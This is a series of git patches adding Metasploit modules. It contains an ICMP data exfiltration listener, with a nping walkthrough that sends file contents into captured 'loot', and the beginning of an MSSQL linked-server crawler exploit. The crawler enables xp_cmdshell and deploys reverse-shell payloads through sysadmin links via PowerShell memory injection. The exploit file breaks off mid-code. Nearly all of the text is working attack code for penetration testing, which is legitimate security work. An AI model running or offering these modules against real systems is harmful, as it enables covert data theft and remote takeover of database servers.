From 8c3f707c9397dce516ff8ea5ab7daf9e77b5d497 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 6 Apr 2012 13:45:10 +0200 Subject: [PATCH 001/154] ICMP Data Exfiltration Module Tested with nping for data exfiltration (client-side script is suggested to get the full functionality out of the module). Walkthrough ============ == Client == ============ > nping --icmp 10.0.0.138 --data-string "BOF:test.txt" -c1 Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time SENT (0.5860s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=42953 iplen=40 RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=3551 iplen=33 Max rtt: 13.000ms | Min rtt: 13.000ms | Avg rtt: 13.000ms Raw packets sent: 1 (54B) | Rcvd: 1 (33B) | Lost: 0 (0.00%) Tx time: 0.46000s | Tx bytes/s: 117.39 | Tx pkts/s: 2.17 Rx time: 1.46000s | Rx bytes/s: 22.60 | Rx pkts/s: 0.68 Nping done: 1 IP address pinged in 2.05 seconds > nping --icmp 10.0.0.138 --data-string "test text...." -c1 Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time SENT (0.6230s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=38228 iplen=41 RCVD (1.0540s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=14168 iplen=33 Max rtt: 10.000ms | Min rtt: 10.000ms | Avg rtt: 10.000ms Raw packets sent: 1 (55B) | Rcvd: 1 (33B) | Lost: 0 (0.00%) Tx time: 0.42200s | Tx bytes/s: 130.33 | Tx pkts/s: 2.37 Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70 Nping done: 1 IP address pinged in 2.04 seconds > nping --icmp 10.0.0.138 --data-string " test text.... again" -c1 Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time SENT (0.6260s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=12163 iplen=48 RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=60632 iplen=33 Max rtt: 12.000ms | Min rtt: 12.000ms | Avg rtt: 12.000ms Raw packets sent: 1 (62B) | Rcvd: 1 (33B) | Lost: 0 (0.00%) Tx time: 0.42100s | Tx bytes/s: 147.27 | Tx pkts/s: 2.38 Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70 Nping done: 1 IP address pinged in 2.05 seconds > nping --icmp 10.0.0.138 --data-string "EOF" -c1 Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:06 W. Europe Daylight Time SENT (0.6420s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=30459 iplen=31 RCVD (1.0970s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=55188 iplen=33 Max rtt: 24.000ms | Min rtt: 24.000ms | Avg rtt: 24.000ms Raw packets sent: 1 (45B) | Rcvd: 1 (33B) | Lost: 0 (0.00%) Tx time: 0.43100s | Tx bytes/s: 104.41 | Tx pkts/s: 2.32 Rx time: 1.43100s | Rx bytes/s: 23.06 | Rx pkts/s: 0.70 Nping done: 1 IP address pinged in 2.07 seconds ============ == SERVER == ============ msf auxiliary(icmp_exfil) > rerun [*] Reloading module... [+] ICMP Listener started on eth0 (10.0.0.138). Monitoring for trigger packet containing ^BOF: [*] 2012-04-04 15:05:31 +0200: SRC:10.0.0.148 ICMP (type 8 code 0) DST:10.0.0.138 [+] Beginning capture of test.txt data [*] Received 18 bytes of data from 10.0.0.148 [*] Received 20 bytes of data from 10.0.0.148 [*] 38 bytes of data recevied in total [+] End of File received. Saving test.txt to loot [+] Incoming file test.txt saved to loot [+] Loot filename: /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt [*] Stopping ICMP listener on eth0 (10.0.0.138) [-] Auxiliary interrupted by the console user [*] Auxiliary module execution completed msf auxiliary(icmp_exfil) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.138 icmp_exfil test.txt text/xml ICMP Exfiltrated Data /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt --- modules/auxiliary/server/icmp_exfil.rb | 238 +++++++++++++++++++++++++ 1 file changed, 238 insertions(+) create mode 100644 modules/auxiliary/server/icmp_exfil.rb diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb new file mode 100644 index 0000000000..c4edcf1ba4 --- /dev/null +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -0,0 +1,238 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Capture + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ICMP Exfiltration', + 'Version' => '$Revision$', + 'Description' => %q{ + This module is designed to provide a server-side component to receive and store files + exfiltrated over ICMP. + + To use this module you will need to send an initial ICMP echo request containing the + specified trigger (defaults to '^BOF:') followed by the filename being sent. All data + received from this source will automatically be added to the receive buffer until an + ICMP echo request containing a specific end command (defaults to 'EOL') is received. + }, + 'Author' => 'Chris John Riley', + 'License' => MSF_LICENSE, + 'References' => + [ + # general + ['URL', 'http://blog.c22.cc'], + # packetfu + ['URL','http://code.google.com/p/packetfu/'] + ] + ) + + register_options([ + OptString.new('START_TRIGGER', [true, 'Trigger to listen for (followed by filename)', '^BOF:']), + OptString.new('END_TRIGGER', [true, 'End of File command', '^EOF']), + OptString.new('RESPONSE', [true, 'Data to respond when initial trigger matches', 'BEGIN']), + OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), + OptString.new('INTERFACE', [false, 'The name of the interface']), + ], self.class) + + register_advanced_options([ + OptString.new('CLOAK', [false, 'Create the response packet using a specific OS fingerprint (windows, linux, freebsd)', 'linux']), + OptBool.new('PROMISC', [false, 'Enable/Disable promiscuous mode', false]), + ], self.class) + + deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') + end + + def run + begin + @interface = datastore['INTERFACE'] || Pcap.lookupdev + @interface = get_interface_guid(@interface) + @iface_ip = Pcap.lookupaddrs(@interface)[0] + + @filter = datastore['BPF_FILTER'] + @eoftrigger = datastore['END_TRIGGER'] + @boftrigger = datastore['START_TRIGGER'] + @response = datastore['RESPONSE'] + @promisc = datastore['PROMISC'] || false + @cloak = datastore['CLOAK'].downcase || 'linux' + + @record = false + + if @promisc + print_status("Warning: Promiscuous mode enabled. This may cause issues!") + end + + # start listner + icmplistener + + rescue => ex + print_error(ex.message) + ensure + storefile + print_status("Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip]) + end + end + + def icmplistener + # start icmp listener + + print_good("ICMP Listener started on %s (%s). Monitoring for trigger packet containing %s" % [@interface, @iface_ip, @boftrigger]) + cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc) + loop { + cap.stream.each do |pkt| + packet = PacketFu::Packet.parse(pkt) + data = packet.payload[4..-1] + + if packet.is_icmp? and data =~ /#{@boftrigger}/ + + print_status("#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr]) + + # detect and warn if system is responding to ICMP echo requests + # suggested fixes: + # + # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all + # (Windows) netsh firewall set icmpsetting 8 disable + # (Windows cont.) netsh firewall set opmode mode = ENABLE + + if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip + raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" + end + + if @record + print_error("New file started without saving old data") + storefile + end + + @p_icmp = packet + + # begin recording stream + @record = true + @record_host = packet.ip_saddr + @record_data = '' + @filename = data[(@boftrigger.length-1)..-1].strip # set filename from icmp payload + + print_good("Beginning capture of %s data" % @filename) + + # create response packet icmp_pkt + icmp_packet + + if not @icmp_response + raise RuntimeError ,"Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end + break + + elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr + # check for EOF marker, if not continue recording + + if data =~ /#{@eoftrigger}/ + print_status("%d bytes of data recevied in total" % @record_data.length) + print_good("End of File received. Saving %s to loot" % @filename) + storefile + @p_icmp = packet + + # create response packet icmp_pkt + icmp_packet + + if not @icmp_response + raise RuntimeError , "Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end + + # turn off recording and clear status + @record = false + @record_host = '' + @record_data = '' + else + @record_data << data.to_s() + print_status("Received %s bytes of data from %s" % [data.length, packet.ip_saddr]) + @p_icmp = packet + + # create response packet icmp_pkt + icmp_packet + + if not @icmp_response + raise RuntimeError , "Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end + end + end + end + } + end + + def icmp_packet + # create icmp response + + begin + + @src_ip = @p_icmp.ip_daddr + @src_mac = @p_icmp.eth_daddr + @dst_ip = @p_icmp.ip_saddr + @dst_mac = @p_icmp.eth_saddr + @icmp_id = @p_icmp.payload[0,2] + @icmp_seq = @p_icmp.payload[2,2] + # create payload with matching id/seq + @resp_payload = @icmp_id + @icmp_seq + @response + + icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak) + icmp_pkt.eth_saddr = @src_mac + icmp_pkt.eth_daddr = @dst_mac + icmp_pkt.icmp_type = 0 + icmp_pkt.icmp_code = 0 + icmp_pkt.payload = @resp_payload + icmp_pkt.ip_saddr = @src_ip + icmp_pkt.ip_daddr = @dst_ip + icmp_pkt.recalc + @icmp_response = icmp_pkt + rescue => ex + print_error(ex.message) + end + end + + def send_icmp + # send icmp response + + begin + @icmp_response.to_w(iface = @interface) + if datastore['VERBOSE'] + print_good("Response sent to %s containing %d bytes of data" % [@dst_ip, @response.length]) + end + rescue => ex + print_error(ex.message) + end + end + + def storefile + # store the file + loot = store_loot( + "icmp_exfil", + "text/xml", + @src_ip, + @record_data, + @filename, + "ICMP Exfiltrated Data" + ) + print_good("Incoming file %s saved to loot" % @filename) + print_good("Loot filename: %s" % loot) + end +end \ No newline at end of file From d48da6741a3b6b3c2f9a178421dcaa8ef6daf727 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Sun, 3 Jun 2012 08:48:47 +0200 Subject: [PATCH 002/154] altered spaces to tabs added basic check to avoid saving empty files to loot --- modules/auxiliary/server/icmp_exfil.rb | 372 +++++++++++++------------ 1 file changed, 187 insertions(+), 185 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index c4edcf1ba4..a5963343d8 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -13,226 +13,228 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Capture - include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Capture + include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'ICMP Exfiltration', - 'Version' => '$Revision$', - 'Description' => %q{ - This module is designed to provide a server-side component to receive and store files - exfiltrated over ICMP. + def initialize + super( + 'Name' => 'ICMP Exfiltration', + 'Version' => '$Revision$', + 'Description' => %q{ + This module is designed to provide a server-side component to receive and store files + exfiltrated over ICMP. - To use this module you will need to send an initial ICMP echo request containing the - specified trigger (defaults to '^BOF:') followed by the filename being sent. All data - received from this source will automatically be added to the receive buffer until an - ICMP echo request containing a specific end command (defaults to 'EOL') is received. - }, - 'Author' => 'Chris John Riley', - 'License' => MSF_LICENSE, - 'References' => - [ - # general - ['URL', 'http://blog.c22.cc'], - # packetfu - ['URL','http://code.google.com/p/packetfu/'] - ] - ) + To use this module you will need to send an initial ICMP echo request containing the + specified trigger (defaults to '^BOF:') followed by the filename being sent. All data + received from this source will automatically be added to the receive buffer until an + ICMP echo request containing a specific end command (defaults to 'EOL') is received. + }, + 'Author' => 'Chris John Riley', + 'License' => MSF_LICENSE, + 'References' => + [ + # general + ['URL', 'http://blog.c22.cc'], + # packetfu + ['URL','http://code.google.com/p/packetfu/'] + ] + ) - register_options([ - OptString.new('START_TRIGGER', [true, 'Trigger to listen for (followed by filename)', '^BOF:']), - OptString.new('END_TRIGGER', [true, 'End of File command', '^EOF']), - OptString.new('RESPONSE', [true, 'Data to respond when initial trigger matches', 'BEGIN']), - OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), - OptString.new('INTERFACE', [false, 'The name of the interface']), - ], self.class) + register_options([ + OptString.new('START_TRIGGER', [true, 'Trigger to listen for (followed by filename)', '^BOF:']), + OptString.new('END_TRIGGER', [true, 'End of File command', '^EOF']), + OptString.new('RESPONSE', [true, 'Data to respond when initial trigger matches', 'BEGIN']), + OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), + OptString.new('INTERFACE', [false, 'The name of the interface']), + ], self.class) - register_advanced_options([ - OptString.new('CLOAK', [false, 'Create the response packet using a specific OS fingerprint (windows, linux, freebsd)', 'linux']), - OptBool.new('PROMISC', [false, 'Enable/Disable promiscuous mode', false]), - ], self.class) + register_advanced_options([ + OptString.new('CLOAK', [false, 'Create the response packet using a specific OS fingerprint (windows, linux, freebsd)', 'linux']), + OptBool.new('PROMISC', [false, 'Enable/Disable promiscuous mode', false]), + ], self.class) - deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') - end + deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') + end - def run - begin - @interface = datastore['INTERFACE'] || Pcap.lookupdev - @interface = get_interface_guid(@interface) - @iface_ip = Pcap.lookupaddrs(@interface)[0] + def run + begin + @interface = datastore['INTERFACE'] || Pcap.lookupdev + @interface = get_interface_guid(@interface) + @iface_ip = Pcap.lookupaddrs(@interface)[0] - @filter = datastore['BPF_FILTER'] - @eoftrigger = datastore['END_TRIGGER'] - @boftrigger = datastore['START_TRIGGER'] - @response = datastore['RESPONSE'] - @promisc = datastore['PROMISC'] || false - @cloak = datastore['CLOAK'].downcase || 'linux' + @filter = datastore['BPF_FILTER'] + @eoftrigger = datastore['END_TRIGGER'] + @boftrigger = datastore['START_TRIGGER'] + @response = datastore['RESPONSE'] + @promisc = datastore['PROMISC'] || false + @cloak = datastore['CLOAK'].downcase || 'linux' - @record = false + @record = false - if @promisc - print_status("Warning: Promiscuous mode enabled. This may cause issues!") - end + if @promisc + print_status("Warning: Promiscuous mode enabled. This may cause issues!") + end - # start listner - icmplistener + # start listner + icmplistener - rescue => ex - print_error(ex.message) - ensure - storefile - print_status("Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip]) - end - end + rescue => ex + print_error(ex.message) + ensure + storefile + print_status("Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip]) + end + end - def icmplistener - # start icmp listener + def icmplistener + # start icmp listener - print_good("ICMP Listener started on %s (%s). Monitoring for trigger packet containing %s" % [@interface, @iface_ip, @boftrigger]) - cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc) - loop { - cap.stream.each do |pkt| - packet = PacketFu::Packet.parse(pkt) - data = packet.payload[4..-1] + print_good("ICMP Listener started on %s (%s). Monitoring for trigger packet containing %s" % [@interface, @iface_ip, @boftrigger]) + cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc) + loop { + cap.stream.each do |pkt| + packet = PacketFu::Packet.parse(pkt) + data = packet.payload[4..-1] - if packet.is_icmp? and data =~ /#{@boftrigger}/ + if packet.is_icmp? and data =~ /#{@boftrigger}/ - print_status("#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr]) + print_status("#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr]) - # detect and warn if system is responding to ICMP echo requests - # suggested fixes: - # - # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all - # (Windows) netsh firewall set icmpsetting 8 disable - # (Windows cont.) netsh firewall set opmode mode = ENABLE + # detect and warn if system is responding to ICMP echo requests + # suggested fixes: + # + # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all + # (Windows) netsh firewall set icmpsetting 8 disable + # (Windows cont.) netsh firewall set opmode mode = ENABLE - if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip - raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" - end + if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip + raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" + end - if @record - print_error("New file started without saving old data") - storefile - end + if @record + print_error("New file started without saving old data") + storefile + end - @p_icmp = packet + @p_icmp = packet - # begin recording stream - @record = true - @record_host = packet.ip_saddr - @record_data = '' - @filename = data[(@boftrigger.length-1)..-1].strip # set filename from icmp payload + # begin recording stream + @record = true + @record_host = packet.ip_saddr + @record_data = '' + @filename = data[(@boftrigger.length-1)..-1].strip # set filename from icmp payload - print_good("Beginning capture of %s data" % @filename) + print_good("Beginning capture of %s data" % @filename) - # create response packet icmp_pkt - icmp_packet + # create response packet icmp_pkt + icmp_packet - if not @icmp_response - raise RuntimeError ,"Could not build ICMP resonse" - else - # send response packet icmp_pkt - send_icmp - end - break + if not @icmp_response + raise RuntimeError ,"Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end + break - elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr - # check for EOF marker, if not continue recording + elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr + # check for EOF marker, if not continue recording - if data =~ /#{@eoftrigger}/ - print_status("%d bytes of data recevied in total" % @record_data.length) - print_good("End of File received. Saving %s to loot" % @filename) - storefile - @p_icmp = packet + if data =~ /#{@eoftrigger}/ + print_status("%d bytes of data recevied in total" % @record_data.length) + print_good("End of File received. Saving %s to loot" % @filename) + storefile + @p_icmp = packet - # create response packet icmp_pkt - icmp_packet + # create response packet icmp_pkt + icmp_packet - if not @icmp_response - raise RuntimeError , "Could not build ICMP resonse" - else - # send response packet icmp_pkt - send_icmp - end + if not @icmp_response + raise RuntimeError , "Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end - # turn off recording and clear status - @record = false - @record_host = '' - @record_data = '' - else - @record_data << data.to_s() - print_status("Received %s bytes of data from %s" % [data.length, packet.ip_saddr]) - @p_icmp = packet + # turn off recording and clear status + @record = false + @record_host = '' + @record_data = '' + else + @record_data << data.to_s() + print_status("Received %s bytes of data from %s" % [data.length, packet.ip_saddr]) + @p_icmp = packet - # create response packet icmp_pkt - icmp_packet + # create response packet icmp_pkt + icmp_packet - if not @icmp_response - raise RuntimeError , "Could not build ICMP resonse" - else - # send response packet icmp_pkt - send_icmp - end - end - end - end - } - end + if not @icmp_response + raise RuntimeError , "Could not build ICMP resonse" + else + # send response packet icmp_pkt + send_icmp + end + end + end + end + } + end - def icmp_packet - # create icmp response + def icmp_packet + # create icmp response - begin + begin - @src_ip = @p_icmp.ip_daddr - @src_mac = @p_icmp.eth_daddr - @dst_ip = @p_icmp.ip_saddr - @dst_mac = @p_icmp.eth_saddr - @icmp_id = @p_icmp.payload[0,2] - @icmp_seq = @p_icmp.payload[2,2] - # create payload with matching id/seq - @resp_payload = @icmp_id + @icmp_seq + @response + @src_ip = @p_icmp.ip_daddr + @src_mac = @p_icmp.eth_daddr + @dst_ip = @p_icmp.ip_saddr + @dst_mac = @p_icmp.eth_saddr + @icmp_id = @p_icmp.payload[0,2] + @icmp_seq = @p_icmp.payload[2,2] + # create payload with matching id/seq + @resp_payload = @icmp_id + @icmp_seq + @response - icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak) - icmp_pkt.eth_saddr = @src_mac - icmp_pkt.eth_daddr = @dst_mac - icmp_pkt.icmp_type = 0 - icmp_pkt.icmp_code = 0 - icmp_pkt.payload = @resp_payload - icmp_pkt.ip_saddr = @src_ip - icmp_pkt.ip_daddr = @dst_ip - icmp_pkt.recalc - @icmp_response = icmp_pkt - rescue => ex - print_error(ex.message) - end - end + icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak) + icmp_pkt.eth_saddr = @src_mac + icmp_pkt.eth_daddr = @dst_mac + icmp_pkt.icmp_type = 0 + icmp_pkt.icmp_code = 0 + icmp_pkt.payload = @resp_payload + icmp_pkt.ip_saddr = @src_ip + icmp_pkt.ip_daddr = @dst_ip + icmp_pkt.recalc + @icmp_response = icmp_pkt + rescue => ex + print_error(ex.message) + end + end - def send_icmp - # send icmp response + def send_icmp + # send icmp response - begin - @icmp_response.to_w(iface = @interface) - if datastore['VERBOSE'] - print_good("Response sent to %s containing %d bytes of data" % [@dst_ip, @response.length]) - end - rescue => ex - print_error(ex.message) - end - end + begin + @icmp_response.to_w(iface = @interface) + if datastore['VERBOSE'] + print_good("Response sent to %s containing %d bytes of data" % [@dst_ip, @response.length]) + end + rescue => ex + print_error(ex.message) + end + end - def storefile - # store the file - loot = store_loot( - "icmp_exfil", - "text/xml", - @src_ip, - @record_data, - @filename, - "ICMP Exfiltrated Data" - ) - print_good("Incoming file %s saved to loot" % @filename) - print_good("Loot filename: %s" % loot) - end + def storefile + # store the file + + if not @record_data.length == 0 + loot = store_loot( + "icmp_exfil", + "text/xml", + @src_ip, + @record_data, + @filename, + "ICMP Exfiltrated Data" + ) + print_good("Incoming file %s saved to loot" % @filename) + print_good("Loot filename: %s" % loot) + end end \ No newline at end of file From 5ce652612544b03be8c5ee2bd1737071fc3de8a0 Mon Sep 17 00:00:00 2001 From: nullbind Date: Sun, 28 Oct 2012 13:49:32 -0500 Subject: [PATCH 003/154] first official release --- .../windows/mssql/mssql_linkcrawler.rb | 534 ++++++++++++++++++ 1 file changed, 534 insertions(+) create mode 100644 modules/exploits/windows/mssql/mssql_linkcrawler.rb diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb new file mode 100644 index 0000000000..042fe61e24 --- /dev/null +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -0,0 +1,534 @@ +require 'msf/core' +require 'msf/core/exploit/mssql_commands' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::MSSQL + include Msf::Auxiliary::Report + include Msf::Exploit::CmdStagerVBS + #include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft SQL Server - Database Link Crawler', + 'Description' => %q{ + This module can be used to crawl MS SQL Server database links and + deploy metasploit payloads through links configured with sysadmin + privileges via a direct database connection once a valid set of + credentials have been provided. If you are attempting to obtain + multiple reverse shells using this module we recommend setting the + “DisablePayloadHandler” advanced option to “true”, and setting up + a multi/handler to run in the background as a job to support + multiple incoming shells. If you are interested in deploying + payloads to spefic servers this module also supports that + functionality via the “DEPLOYLIST” option. Currently, the module + is capable of delivering payloads to both 32bit and 64bit Windows + systems via powershell memory injection methods based on Matthew + Graeber’s work . As a result, the target server must have + powershell installed. By default, all of the crawl information is + saved to a CSV formatted log file and MSF loot so that the tool + can also be used for auditing without deploying payloads. + }, + 'Author' => + [ + 'Antti Rantasaari ', + 'nullbind ' + ], + 'Platform' => [ 'Windows' ], + 'License' => MSF_LICENSE, + 'References' => [[ 'URL', 'http://www.netspi.com/' ]], + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), + + ], self.class) + end + + def exploit + + # Display start time + time1 = Time.new + print_status("-------------------------------------------------") + print_status("Start time : #{time1.inspect}") + print_status("-------------------------------------------------") + + # Check if credentials are correct + print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") + + if (not mssql_login_datastore) + print_error("Invalid SQL Server credentials") + print_status("-------------------------------------------------") + return + end + + # Define master array to keep track of enumerated database information + masterList = Array.new + masterList[0] = Hash.new # Define new hash + masterList[0]["name"] = "" # Name of the current database server + masterList[0]["db_link"] = "" # Name of the linked database server + masterList[0]["db_user"] = "" # User configured on the database server link + masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges + masterList[0]["db_version"] = "" # Database version of the linked database server + masterList[0]["db_os"] = "" # OS of the linked database server + masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored + masterList[0]["done"] = 0 # Used to determine if linked need to be crawled + + shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system + + # Setup query for gathering information from database servers + versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+ CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 -charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount" + + # Create loot table to store configuration information from crawled database server links + linked_server_table = Rex::Ui::Text::Table.new( + 'Header' => 'Linked Server Table', + 'Ident' => 1, + 'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state'] + ) + save_loot = "" + + # Start crawling through linked database servers + while masterList.any? {|f| f["done"] == 0} + # Find the first DB server that has not been crawled (not marked as done) + server = masterList.detect {|f| f["done"] == 0} + + # Get configuration information from the database server + sql = query_builder(server["path"].first,"",0,versionQuery) + result = mssql_query(sql, false) if mssql_login_datastore + parse_results = result[:rows] + parse_results.each { |s| + server["name"] = s[0] + server["db_user"] = s[1] + server["db_sysadmin"] = s[5] + server["db_version"] = s[3] + server["db_os"] = s[4] + server["numlinks"] = s[6] + } + if masterList.length == 1 + print_good("Successfully connected to #{server["name"]}") + if datastore['VERBOSE'] == true + show_configs(server["name"],parse_results,true) + elsif server["db_sysadmin"] == 1 + print_good("Sysadmin on #{server["name"]}") + end + end + if server["db_sysadmin"] == 1 + enable_xp_cmdshell(server["path"].first,server["name"],shelled) + end + + # If links were found, determine if they can be connected to and add to crawl list + if (server["numlinks"] > 0) + # Enable loot + save_loot = "yes" + + # Select a list of the linked database servers that exist on the current database server + print_status("") + print_status("-------------------------------------------------") + print_status("Crawling links on #{server["name"]}...") + # Display number db server links + print_status("Links found: #{server["numlinks"]}") + print_status("-------------------------------------------------") + execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'" + sql = query_builder(server["path"].first,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + result[:rows].each {|name| + name.each {|name| + + # Check if link works and if sysadmin permissions - temp array to save orig server[path] + temppath = Array.new + temppath = server["path"].first.dup + temppath << name + + # Get configuration information from the linked server + sql = query_builder(temppath,"",0,versionQuery) + result = mssql_query(sql, false) if mssql_login_datastore + + # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists + if result[:errors].empty? and result[:rows] != nil then + # Assign db query results to variables for hash + parse_results = result[:rows] + + # Add link server information to loot + link_status = 'up' + write_to_report(name,server,parse_results,linked_server_table,link_status) + + # Display link server information in verbose mode + if datastore['VERBOSE'] == true + show_configs(name,parse_results) + print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") + else + if parse_results[0][5] == 1 + print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)") + else + print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") + end + end + + # Add link to masterlist hash + unless masterList.any? {|f| f["name"] == name} + masterList << add_host(name,server["path"].first,parse_results) + else + (0..masterList.length-1).each do |x| + if masterList[x]["name"] == name + masterList[x]["path"] << server["path"].first.dup + masterList[x]["path"].last << name + unless shelled.include?(name) + if parse_results[0][2]==1 + enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled) + end + end + else + break + end + end + end + else + # Add to report + linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] + + # Display status to user + if datastore['VERBOSE'] == true + print_status(" ") + print_error("Linked Server: #{name} ") + print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") + print_status(" Failure could be due to:") + print_status(" - A dead server") + print_status(" - Bad credentials") + print_status(" - Nested open queries through SQL 2000") + else + print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") + end + end + } + } + end + # Set server to "crawled" + server["done"]=1 + end + + print_status("-------------------------------------------------") + + # Setup table for loot + this_service = nil + if framework.db and framework.db.active + this_service = report_service( + :host => rhost, + :port => rport, + :name => 'mssql', + 